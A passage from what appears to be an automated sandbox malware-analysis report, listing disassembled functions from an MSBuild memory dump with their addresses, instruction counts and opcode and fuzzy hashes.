                                                                                                              • Opcode Fuzzy Hash: 68f0e998a476c67a5308346dc6ffb2ef60589c6b94b0efbe271a4bfe6a517008
                                                                                                              • Instruction Fuzzy Hash: E5A1FB72B006169FDB29CF6AD990BAE77B5FF44718F004029EA49D7391DB34E815CB40
                                                                                                              Function 01464500 Relevance: .3, Instructions: 275COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6b9f059edf1b9227042d388146cbdbc01209a833ed3135dfa78ce7c96678598d
                                                                                                              • Instruction ID: 86c45eeff6e4237594bfe497f0398203b556877f4fece51e13159b0b5929ce45
                                                                                                              • Opcode Fuzzy Hash: 6b9f059edf1b9227042d388146cbdbc01209a833ed3135dfa78ce7c96678598d
                                                                                                              • Instruction Fuzzy Hash: C6A1CE72A04652EFCB11DF18C980B5ABBE9FF48708F49052EE5899B761D334ED41CB92
                                                                                                              Function 01462B57 Relevance: .3, Instructions: 266COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                              • Instruction ID: 6c278e0d322f68a34631dce090c7121e677efb7b02ade64b450dad522cb5f0ef
                                                                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                              • Instruction Fuzzy Hash: 00B16C71E0061AEFDF14CFADC880AAEB7B9FF58314F14812AE914A7364D770A941CB91
                                                                                                              Function 014160E0 Relevance: .3, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cf76fc82ac8bccf667a9ddb28fb85757fc8834c04c4b8e8545b63f5c6d4cf71
                                                                                                              • Instruction ID: 18fec1661f19dde96113f3978cae4a2b370e5c442e22e36f8d59553049402a79
                                                                                                              • Opcode Fuzzy Hash: 5cf76fc82ac8bccf667a9ddb28fb85757fc8834c04c4b8e8545b63f5c6d4cf71
                                                                                                              • Instruction Fuzzy Hash: C291A471D0021AAFDB15DF68D884BBEBFB5EF48710F16415AE610EB365D7B4D9008BA0
                                                                                                              Function 013AE3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b86ac43ec25ac680756859a2faa076c61df0e6da556218ac82c1da1db728bd1
                                                                                                              • Instruction ID: 4a894e621dfa0b501cb102a81d427850ce93a4dde80e69b15fcf1751b4e47a80
                                                                                                              • Opcode Fuzzy Hash: 0b86ac43ec25ac680756859a2faa076c61df0e6da556218ac82c1da1db728bd1
                                                                                                              • Instruction Fuzzy Hash: C4916532A00216CBEB24DB5DD484B7EBBA5EF9471CF458079EE45AB790E734D801CB91
                                                                                                              Function 0145AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction ID: 223e9ed44d35c6564f15b4ce1d93940066b972b1e70a5019d921775ab9e1344b
                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction Fuzzy Hash: 07819431A0020A9FDF59DF59C490AAEBBF2FF84310F24866ADD169B355D734D906CB80
                                                                                                              Function 013CE284 Relevance: .2, Instructions: 212COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 06ba98d9cd9c03ec889d52bcb2fac37a571c88822b26eff5407224dc48ff781b
                                                                                                              • Instruction ID: 7d536d6dbd7f3b9bfa5964a0a664a6d33ad965f4a7c9901fd4c3fe91932182c6
                                                                                                              • Opcode Fuzzy Hash: 06ba98d9cd9c03ec889d52bcb2fac37a571c88822b26eff5407224dc48ff781b
                                                                                                              • Instruction Fuzzy Hash: 86815071A00609AFDB26CFA9C880BEEBBBAFF48758F10443DE555A7251D730AD45CB50
                                                                                                              Function 013AC640 Relevance: .2, Instructions: 206COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b844187a834748611595369b603a2cc26a704aee80f73b7238b4c81d8a56cd6e
                                                                                                              • Instruction ID: f2f986432f6382c0eeca53ff768d51b891ba853d82098f05c08991e88d605a34
                                                                                                              • Opcode Fuzzy Hash: b844187a834748611595369b603a2cc26a704aee80f73b7238b4c81d8a56cd6e
                                                                                                              • Instruction Fuzzy Hash: D871BD75901669DFCB29CF58C8907BEBBB5FF58718F54415EE942AB3A0D7349800CB90
                                                                                                              Function 014447A0 Relevance: .2, Instructions: 202COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6afe3198907d2dbc93c8ec611259787735aa4b12374e51b08e0b9b9a693a46fb
                                                                                                              • Instruction ID: c783a48881ef56747b6db2310659c4b147b72a8c0406cfd289777179cefb55fd
                                                                                                              • Opcode Fuzzy Hash: 6afe3198907d2dbc93c8ec611259787735aa4b12374e51b08e0b9b9a693a46fb
                                                                                                              • Instruction Fuzzy Hash: A8715D70900205EFEB60DFA9DA44B9EBBF8EB94300F19815FE614AB379C7318941DB64
                                                                                                              Function 013A260B Relevance: .2, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3a6b23dd6099417d44daea1b8f2b495ebf30e2077497630266e116d09e3e2e62
                                                                                                              • Instruction ID: d26d166a364b6c7a52a1d0ac6719118b0ebf2d74b2925b8d7b20089f65849eb0
                                                                                                              • Opcode Fuzzy Hash: 3a6b23dd6099417d44daea1b8f2b495ebf30e2077497630266e116d09e3e2e62
                                                                                                              • Instruction Fuzzy Hash: EB71EF756046428FD312DF2CC480B2BBBE5FF84318F0585AAE899CB762EB74D945CB91
                                                                                                              Function 0141035C Relevance: .2, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction ID: d5e8a0ea901aebcc94788eb1d290c5c2231129be7c954005517d1cc2e365a288
                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction Fuzzy Hash: F1716F71A00619EFDB10DFA9C984EDEBBB9FF58704F10456AE505E7260DB34EA41CB90
                                                                                                              Function 014262A0 Relevance: .2, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb41802f62e1ca6c5190cde683e15e217125d3c4d0f4d236535aa464a12c71ee
                                                                                                              • Instruction ID: e9feecdb8e0e7e5a2bcba9025d8e6a4f51d4c78ae07d2c015a699396e8433fde
                                                                                                              • Opcode Fuzzy Hash: fb41802f62e1ca6c5190cde683e15e217125d3c4d0f4d236535aa464a12c71ee
                                                                                                              • Instruction Fuzzy Hash: D2710232200721AFEB32DF18C844F5BBBA6FF40724F564529EA958B2B0D770E985CB54
                                                                                                              Function 01398AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 19903c3a934bd14a5beef71317f1dd13e702a1101e5748700396ac5f0b22dbf1
                                                                                                              • Instruction ID: 68e63d18509b19a7adde169aedb653750d3db7eafa5eb913f2fb82d56406d46f
                                                                                                              • Opcode Fuzzy Hash: 19903c3a934bd14a5beef71317f1dd13e702a1101e5748700396ac5f0b22dbf1
                                                                                                              • Instruction Fuzzy Hash: 9F81AC72A0431ADFDB24CF9CD494BAEBBB5AF89318F19416DDA00AB691C734DD40CB90
                                                                                                              Function 01468324 Relevance: .2, Instructions: 192COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e114da68e43de921969236ca778c5da78bff7196d979420420262d89ef45770
                                                                                                              • Instruction ID: 6d06cb000316ed3a94b516af2ac6f7393f6894c5e4ec508ab8c8658c569b33fc
                                                                                                              • Opcode Fuzzy Hash: 6e114da68e43de921969236ca778c5da78bff7196d979420420262d89ef45770
                                                                                                              • Instruction Fuzzy Hash: 5D710D72E0020AAFDF15DF94C841FEFBBB9FB04358F10412AE615A72A0D775AA45CB91
                                                                                                              Function 0144A250 Relevance: .2, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c4495e64835fb28e88b8eabb9a9e8d007dfdc7f55f188b096f291925c44d1a0c
                                                                                                              • Instruction ID: 790d97cf3e17e15a565a8fe0ee2e9b9bb89e1a1c32d416aaafd9bd9dd48ac832
                                                                                                              • Opcode Fuzzy Hash: c4495e64835fb28e88b8eabb9a9e8d007dfdc7f55f188b096f291925c44d1a0c
                                                                                                              • Instruction Fuzzy Hash: 9851BD73504612AFE711DA68C844E5FB7E8EB84754F00493AFA42DB260D770ED0587A2
                                                                                                              Function 01438350 Relevance: .2, Instructions: 161COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 47df78686818e1e69e8acbf5ebca683e5a3b3ffa09a4ee82ba6ad474a17829cd
                                                                                                              • Instruction ID: effc19bbb8b093dc3104e7ca6f792ea3441043917b5c78167f80c952f4269d3f
                                                                                                              • Opcode Fuzzy Hash: 47df78686818e1e69e8acbf5ebca683e5a3b3ffa09a4ee82ba6ad474a17829cd
                                                                                                              • Instruction Fuzzy Hash: 82517F70900706ABD721DF5AC880A9BFBF8BFA8714F10472EE19697AB1D7B0A545CB50
                                                                                                              Function 013CE443 Relevance: .2, Instructions: 158COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d4da604a1b1f707292f6f0a0de3e4de3af9c1756e6292a163cce6833e312baa9
                                                                                                              • Instruction ID: 8ccb7356ac3fd31738598132eb221c1775e4ea3bd3b260b32f0936f1ae7bec7e
                                                                                                              • Opcode Fuzzy Hash: d4da604a1b1f707292f6f0a0de3e4de3af9c1756e6292a163cce6833e312baa9
                                                                                                              • Instruction Fuzzy Hash: 5E514871600A05EFDB22EFA9C980EAAB7BDFF54B88F40046EE54697661D734ED40CB50
                                                                                                              Function 01434180 Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1ce0e9211249ffaf810b3590f3fdab1865cf0e936ae944c0a8c964cca1b8c7c7
                                                                                                              • Instruction ID: 37d344d2455b80be71b26911d5239db4a8fd0a422cb7f317f9ceec4120374d03
                                                                                                              • Opcode Fuzzy Hash: 1ce0e9211249ffaf810b3590f3fdab1865cf0e936ae944c0a8c964cca1b8c7c7
                                                                                                              • Instruction Fuzzy Hash: 6A5157716083029FD754DF69C881AABBBE5BFD8208F58492EF589C7360EB30D905CB52
                                                                                                              Function 013B45B1 Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction ID: f3dcfa67cca41de9acc383b3a173bc6bd7e513fccc77a44caee4e472039cea6c
                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction Fuzzy Hash: FE51A471E0021AABDF15DF98C481BEEBBB9EF49358F044069EB12AB641E734DD44CB94
                                                                                                              Function 0141E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction ID: 27d09960beb4de017123bb539b895a214e6bdfa2618e9ffded236efda2232808
                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction Fuzzy Hash: D9519675D0020AABEF22DA94C884BAFBB75BF00354F154666DE12772A4D7309D45C7A0
                                                                                                              Function 01458B28 Relevance: .2, Instructions: 152COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6fe60ceb5ce058706dcf6ce73179d60ac1ec0722dfb76fabaaa53fb5a6e71b3b
                                                                                                              • Instruction ID: 5c9c2026649635ea1ca9f22c101c38f9bf418b171a20f14a86dd8b15dfe78290
                                                                                                              • Opcode Fuzzy Hash: 6fe60ceb5ce058706dcf6ce73179d60ac1ec0722dfb76fabaaa53fb5a6e71b3b
                                                                                                              • Instruction Fuzzy Hash: 5641B6707016129BD76A9B2FC854B7BBB9AEF90620F04411AFD55873A3DF30D801C691
                                                                                                              Function 0141CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8ef3a438e4ec6b226873f15542549ed56f917d7933b0244a6281a7afa8920a89
                                                                                                              • Instruction ID: b9dbbd9cb27815f6e99cda1998c17529d287286252515d5f68a2208a18f07d0c
                                                                                                              • Opcode Fuzzy Hash: 8ef3a438e4ec6b226873f15542549ed56f917d7933b0244a6281a7afa8920a89
                                                                                                              • Instruction Fuzzy Hash: 20517C72940216DFCB20DFADC9C0AAFBBB9FB48358B51451AD549A3718E730AD42CB90
                                                                                                              Function 0145A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction ID: bead628a82803bd8a20c183cab5ae1970512addf247d9aca6df388d670601d13
                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction Fuzzy Hash: 4B41D3316006169FDB65CE28C984A6BB7A9FF90214B15862FEE5287752EB30ED05C7D0
                                                                                                              Function 013C01F8 Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d1dc792ae5ad9a639f6b31767285238a29e3885a916b6d3eb8c9276d700b49bd
                                                                                                              • Instruction ID: 0782387fc3a6b2ad2ed4cc6ae2e52932a467e76a3ab10b29e07d17b10ca9b549
                                                                                                              • Opcode Fuzzy Hash: d1dc792ae5ad9a639f6b31767285238a29e3885a916b6d3eb8c9276d700b49bd
                                                                                                              • Instruction Fuzzy Hash: EB41AA3AA00259DBDB19DF98C440AEEBBB9BF48B18F14816EF815F7250D7359C41CBA4
                                                                                                              Function 013BEBFC Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0cc744e0193ed1eef6e172487d63a2f67a5e304e21afc8e3813fc3ee1dd8f39
                                                                                                              • Instruction ID: d42c5713b622d2a111e9e4358d8ce60876367e94b0dba61bae6c0fe8ef140529
                                                                                                              • Opcode Fuzzy Hash: b0cc744e0193ed1eef6e172487d63a2f67a5e304e21afc8e3813fc3ee1dd8f39
                                                                                                              • Instruction Fuzzy Hash: CF41B1726043058FDB20DF2CC880A9BB7E9FB8421CF00493DEA56C3A55EB74E8448B51
                                                                                                              Function 013D2750 Relevance: .1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction ID: 005a5bde9666dc92b8d30c7fb96407b801cd52010530acd2972749dd45ba08b2
                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction Fuzzy Hash: 9B515D75A00215CFDB16CF9DC480AAEF7B1FF84710F2981AAD915A73A1D774AE42CB90
                                                                                                              Function 01396154 Relevance: .1, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9bd5a3d23b3046041a9f5219cefae82bc42d7973756673d9cbfb94f9caed2ea8
                                                                                                              • Instruction ID: aa9ba01d6b1da5ccdeb922be36b090309cb79f220733b28a491617385d153391
                                                                                                              • Opcode Fuzzy Hash: 9bd5a3d23b3046041a9f5219cefae82bc42d7973756673d9cbfb94f9caed2ea8
                                                                                                              • Instruction Fuzzy Hash: 1351E5B0901206DBDF299B2CCC01BADBBB5EF1131CF1482E9E569A76D2D7349981CF40
                                                                                                              Function 01390BCD Relevance: .1, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cdf3facd92d9f08f4fe937f503149981797e41c64bac21a1c98d47eef0914b61
                                                                                                              • Instruction ID: c84ded6e29e944ba32b8ac66bb4a63318104a1565eae0cb5831b73669975626c
                                                                                                              • Opcode Fuzzy Hash: cdf3facd92d9f08f4fe937f503149981797e41c64bac21a1c98d47eef0914b61
                                                                                                              • Instruction Fuzzy Hash: EE416D32A00369DEDF21DF6CC944BEAB7B8EF45744F4100A5E909AB281D6749E84CF91
                                                                                                              Function 0145866E Relevance: .1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction ID: e47b05a84c46debcf2fce7c351b449cc9d8bc75bd2a9125bf6cb4f1df174b155
                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction Fuzzy Hash: 74419675B00106EBDB55DF9ACC84ABFBBBAAF98610F14406AED0497362DE70DD11C7A0
                                                                                                              Function 01390887 Relevance: .1, Instructions: 128COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a8fdd37c8ad2c7b9fa9fa40781aee859e0fad0aaa462b5003efcbfe77d6d73ef
                                                                                                              • Instruction ID: 3597c61775a8607307c3c57b1cce2e1082829b33245a03cd91560d5e0c2aaeb0
                                                                                                              • Opcode Fuzzy Hash: a8fdd37c8ad2c7b9fa9fa40781aee859e0fad0aaa462b5003efcbfe77d6d73ef
                                                                                                              • Instruction Fuzzy Hash: E441A3716007059FEB29CF29C480A26BBFDFF49318B144A6DE55787A60E730E855CB90
                                                                                                              Function 013BA470 Relevance: .1, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
